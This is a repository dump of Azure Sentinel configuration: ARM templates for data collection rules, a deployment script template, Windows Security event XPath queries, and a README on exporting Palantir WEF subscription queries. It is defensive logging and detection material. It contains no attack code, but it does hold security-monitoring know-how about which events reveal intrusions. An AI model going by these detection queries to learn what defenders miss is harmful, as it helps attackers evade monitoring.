28 | } 29 | }, 30 | "destinations": { 31 | "type": "Object", 32 | "metadata": { 33 | "description": "The specification of destinations." 34 | } 35 | }, 36 | "tagsArray": { 37 | "type": "Object" 38 | } 39 | }, 40 | "resources": [ 41 | { 42 | "type": "microsoft.insights/dataCollectionRules", 43 | "apiVersion": "2021-04-01", 44 | "name": "[parameters('ruleName')]", 45 | "location": "[parameters('location')]", 46 | "tags": "[parameters('tagsArray')]", 47 | "properties": { 48 | "dataSources": "[parameters('dataSources')]", 49 | "destinations": "[parameters('destinations')]", 50 | "dataFlows": "[parameters('dataFlows')]" 51 | } 52 | } 53 | ], 54 | "outputs": { 55 | "dataCollectionRuleId": { 56 | "type": "String", 57 | "value": "[resourceId('microsoft.insights/dataCollectionRules', parameters('ruleName'))]" 58 | } 59 | } 60 | } 61 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/creation-deploymentscript.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "workspaceId": { 6 | "type": "string", 7 | "metadata": { 8 | "description": "Log Analytics workspace ID" 9 | } 10 | }, 11 | "workspaceResourceId": { 12 | "type": "string", 13 | "metadata": { 14 | "description": "Log Analytics workspace resource ID" 15 | } 16 | }, 17 | "dataCollectionRuleName": { 18 | "type": "string", 19 | "metadata": { 20 | "description": "Name for the data collection rule" 21 | } 22 | }, 23 | "dataSourcesFileUrl": { 24 | "type": "string", 25 | "metadata": { 26 | "description": "URL to download a Data Collection Rules Data Sources File (JSON File)." 27 | } 28 | }, 29 | "location": { 30 | "type": "string", 31 | "metadata": { 32 | "description": "Specifies the location in which to create the data collection rule." 
33 | }, 34 | "defaultValue": "[resourceGroup().location]" 35 | }, 36 | "roleGuid": { 37 | "type": "string", 38 | "defaultValue": "[newGuid()]" 39 | } 40 | }, 41 | "functions": [], 42 | "variables": { 43 | "identityName": "[concat('userIdentity',uniqueString(resourceGroup().id))]", 44 | "DataSourceFile": "[last(split(parameters('dataSourcesFileUrl'),'/'))]", 45 | "createDCScript": "https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/master/microsoft-sentinel/scripts/Create-DataCollectionRules.ps1", 46 | "scriptArguments": "[concat('-WorkspaceId ', parameters('WorkspaceId'), ' -WorkspaceResourceId ', parameters('WorkspaceResourceId'),' -ResourceGroup ', resourceGroup().name, ' -DataCollectionRuleName ', parameters('DataCollectionRuleName'), ' -DataSourcesFile ', variables('DataSourceFile'), ' -Location ', parameters('location'), ' -verbose')]" 47 | }, 48 | "resources": [ 49 | { 50 | "type": "Microsoft.ManagedIdentity/userAssignedIdentities", 51 | "name": "[variables('identityName')]", 52 | "apiVersion": "2018-11-30", 53 | "location": "[resourceGroup().location]" 54 | }, 55 | { 56 | "type": "Microsoft.Resources/deploymentScripts", 57 | "apiVersion": "2020-10-01", 58 | "name": "sleep", 59 | "location": "[resourceGroup().location]", 60 | "kind": "AzurePowerShell", 61 | "dependsOn": [ 62 | "[concat('Microsoft.ManagedIdentity/userAssignedIdentities/', variables('identityName'))]" 63 | ], 64 | "properties": { 65 | "forceUpdateTag": "1", 66 | "azPowerShellVersion": "3.0", 67 | "arguments": "", 68 | "scriptContent": "Start-Sleep -Seconds 120", 69 | "supportingScriptUris": [], 70 | "timeout": "PT30M", 71 | "cleanupPreference": "Always", 72 | "retentionInterval": "P1D" 73 | } 74 | }, 75 | { 76 | "apiVersion": "2017-09-01", 77 | "type": "Microsoft.Authorization/roleAssignments", 78 | "name": "[parameters('roleGuid')]", 79 | "dependsOn": [ 80 | "[concat('Microsoft.Resources/deploymentScripts/', 'sleep')]" 81 | ], 82 | "properties": { 83 | "roleDefinitionId": 
"[concat('/subscriptions/', subscription().subscriptionId, '/providers/Microsoft.Authorization/roleDefinitions/', 'b24988ac-6180-42a0-ab88-20f7382dd24c')]", 84 | "principalId": "[reference(resourceId('Microsoft.ManagedIdentity/userAssignedIdentities', variables('identityName')), '2018-11-30', 'Full').properties.principalId]", 85 | "scope": "[resourceGroup().id]" 86 | } 87 | }, 88 | { 89 | "type": "Microsoft.Resources/deploymentScripts", 90 | "apiVersion": "2020-10-01", 91 | "name": "runPowerShellInlineWithOutput", 92 | "location": "[resourceGroup().location]", 93 | "kind": "AzurePowerShell", 94 | "identity": { 95 | "type": "UserAssigned", 96 | "userAssignedIdentities": { 97 | "[resourceID('Microsoft.ManagedIdentity/userAssignedIdentities/',variables('identityName'))]": {} 98 | } 99 | }, 100 | "dependsOn": [ 101 | "[concat('Microsoft.Authorization/roleAssignments/', parameters('roleGuid'))]" 102 | ], 103 | "properties": { 104 | "forceUpdateTag": "1", 105 | "azPowerShellVersion": "3.0", 106 | "arguments": "[variables('scriptArguments')]", 107 | "primaryScriptUri": "[variables('createDCScript')]", 108 | "supportingScriptUris": [ 109 | "[parameters('dataSourcesFileUrl')]" 110 | ], 111 | "timeout": "PT30M", 112 | "cleanupPreference": "OnSuccess", 113 | "retentionInterval": "P1D" 114 | } 115 | } 116 | ], 117 | "outputs": { 118 | "dataCollectionRuleId": { 119 | "value": "[reference('runPowerShellInlineWithOutput').outputs.text]", 120 | "type": "string" 121 | } 122 | } 123 | } 124 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/active-directory.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/active-directory.xml 
-------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/command.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/command.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/file.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/file.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/logon-session.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/logon-session.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/network-share.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/network-share.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/network-traffic.xml: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/network-traffic.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/ossem-attack.json: -------------------------------------------------------------------------------- 1 | { 2 | "windowsEventLogs": [ 3 | { 4 | "Name": "eventLogsDataSource", 5 | "scheduledTransferPeriod": "PT1M", 6 | "streams": [ 7 | "Microsoft-WindowsEvent" 8 | ], 9 | "xPathQueries": [ 10 | "Security!*[System[(EventID=5136 or EventID=5139)]]", 11 | "Security!*[System[(EventID=5137)]]", 12 | "Security!*[System[(EventID=5141)]]", 13 | "Security!*[System[(EventID=4662 or EventID=4661)]]", 14 | "Security!*[System[(EventID=4768 or EventID=4769)]]", 15 | "Security!*[System[(EventID=4688)]]", 16 | "Security!*[System[(EventID=4660)]]", 17 | "Security!(*[System[EventID=4656]] and ((*[EventData[Data[@Name='ObjectType']='File']]))) or (*[System[EventID=4663]] and ((*[EventData[Data[@Name='ObjectType']='File']]))) or (*[System[EventID=4661]] and ((*[EventData[Data[@Name='ObjectType']='SAM']])))", 18 | "Security!*[System[(EventID=4670)]]", 19 | "Security!*[System[(EventID=4624 or EventID=4778 or EventID=4964)]]", 20 | "Security!*[System[(EventID=5140 or EventID=5145)]]", 21 | "Security!*[System[(EventID=5154 or EventID=5159 or EventID=5155 or EventID=5158 or EventID=5156 or EventID=5157 or EventID=5031)]]", 22 | "Security!(*[System[EventID=4656]] and ((*[EventData[Data[@Name='ObjectType']='Process']]))) or (*[System[EventID=4663]] and ((*[EventData[Data[@Name='ObjectType']='Process']])))", 23 | "Security!*[System[(EventID=4689)]]", 24 | "Security!*[System[(EventID=4698)]]", 25 | "Security!*[System[(EventID=4701 or EventID=4700 or EventID=4702)]]", 
26 | "Security!*[System[(EventID=4697)]]", 27 | "Security!*[System[(EventID=4725 or EventID=4722 or EventID=4717 or EventID=4740 or EventID=4738 or EventID=4781 or EventID=4767 or EventID=4718)]]", 28 | "Security!*[System[(EventID=4624 or EventID=4625 or EventID=4648)]]", 29 | "Security!*[System[(EventID=4726)]]", 30 | "Security!*[System[(EventID=4720)]]", 31 | "Security!*[System[(EventID=4670 or EventID=4657)]]", 32 | "Security!(*[System[EventID=4656]] and ((*[EventData[Data[@Name='ObjectType']='Key']]))) or (*[System[EventID=4663]] and ((*[EventData[Data[@Name='ObjectType']='Key']])))" 33 | ] 34 | } 35 | ] 36 | } 37 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/process.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/process.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/scheduled-job.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/scheduled-job.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/service.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/service.xml 
-------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/user-account.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/user-account.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/windows-registry.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/ossem-attack/windows-registry.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/ADFS.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/ADFS.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Account-Lockout.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Account-Lockout.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Account-Management.xml: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Account-Management.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Active-Directory.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Active-Directory.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Application-Crashes.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Application-Crashes.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Applocker.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Applocker.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Authentication.xml: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Authentication.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Autoruns.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Autoruns.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Bits-Client.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Bits-Client.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Certificate-Authority.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Certificate-Authority.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Code-Integrity.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Code-Integrity.xml 
-------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/DNS.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/DNS.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Device-Guard.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Device-Guard.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Drivers.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Drivers.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Duo-Security.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Duo-Security.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/EMET.xml: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/EMET.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Event-Log-Diagnostics.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Event-Log-Diagnostics.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Explicit-Credentials.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Explicit-Credentials.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Exploit-Guard-ASR.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Exploit-Guard-ASR.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Exploit-Guard-CFA.xml: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Exploit-Guard-CFA.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Exploit-Guard-EP.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Exploit-Guard-EP.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Exploit-Guard-NP.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Exploit-Guard-NP.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/External-Devices.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/External-Devices.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Firewall.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Firewall.xml 
-------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Group-Policy-Errors.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Group-Policy-Errors.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Kerberos.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Kerberos.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Log-Deletion-Security.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Log-Deletion-Security.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Log-Deletion-System.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Log-Deletion-System.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/MSI-Packages.xml: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/MSI-Packages.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Microsoft-Office.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Microsoft-Office.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/NTLM.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/NTLM.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Object-Manipulation.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Object-Manipulation.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Operating-System.xml: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Operating-System.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Powershell.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Powershell.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Print.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Print.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Privilege-Use.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Privilege-Use.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Process-Execution.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Process-Execution.xml 
-------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/README.md: -------------------------------------------------------------------------------- 1 | # Palantir WEF Subscriptions 2 | 3 | ## Reference: 4 | 5 | ### https://github.com/palantir/windows-event-forwarding 6 | 7 | ## Export Queries 8 | 9 | ### Clone Repository 10 | 11 | ```PowerShell 12 | git clone https://github.com/palantir/windows-event-forwarding 13 | cd windows-event-forwarding/wef-subscription 14 | ``` 15 | 16 | ### Export Queries from WEF Subscriptions 17 | 18 | ```PowerShell 19 | $all = Get-ChildItem *.xml 20 | ForEach ( $file in $all){ 21 | $fileName = Split-Path $file -Leaf 22 | [xml]$subscription = get-content $file 23 | [xml]$xmlContent = $subscription.Subscription.Query.'#cdata-section' 24 | $StringWriter = New-Object System.IO.StringWriter 25 | $XmlWriter = New-Object System.XMl.XmlTextWriter $StringWriter 26 | $xmlWriter.Formatting = "indented" 27 | $xmlWriter.Indentation = 2 28 | $xmlWriter.IndentChar = ' ' 29 | $xmlContent.WriteContentTo($XmlWriter) 30 | $XmlWriter.Flush() 31 | $StringWriter.Flush() 32 | 33 | $StringWriter.ToString() | out-file "Queries\$fileName" 34 | } 35 | ``` 36 | 37 | ## Test XML Query 38 | 39 | ### Read Account-Lockout.xml Example 40 | 41 | ```PowerShell 42 | 43 | [xml]$Account = get-content .\Account-Lockout.xml 44 | $Account.InnerXml 45 | ``` 46 | 47 | ```xml 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | ``` 58 | 59 | ### Run XML Query 60 | 61 | ```PowerShell 62 | Get-WinEvent -FilterXml $Account 63 | ``` 64 | 65 | ## Export XPath Query for Windows Security Events Connector 66 | 67 | ```PowerShell 68 | $Account.QueryList.Query | ForEach-Object {-join ($_.Select.Path, '!', $_.Select.'#text') } 69 | ``` 70 | 71 | ``` 72 | Security!*[System[Provider[@Name='Microsoft-Windows-Security-Auditing'] and (Level=4 or Level=0) and EventID=4740]] 73 | ``` 74 | 
-------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Registry.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Registry.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Services.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Services.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Shares.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Shares.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Smart-Card.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Smart-Card.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Software-Restriction-Policies.xml: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Software-Restriction-Policies.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Sysmon.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Sysmon.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/System-Time-Change.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/System-Time-Change.xml -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Task-Scheduler.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/microsoft-sentinel/linkedtemplates/data-collection-rules/rules/palantir/Task-Scheduler.xml -------------------------------------------------------------------------------- 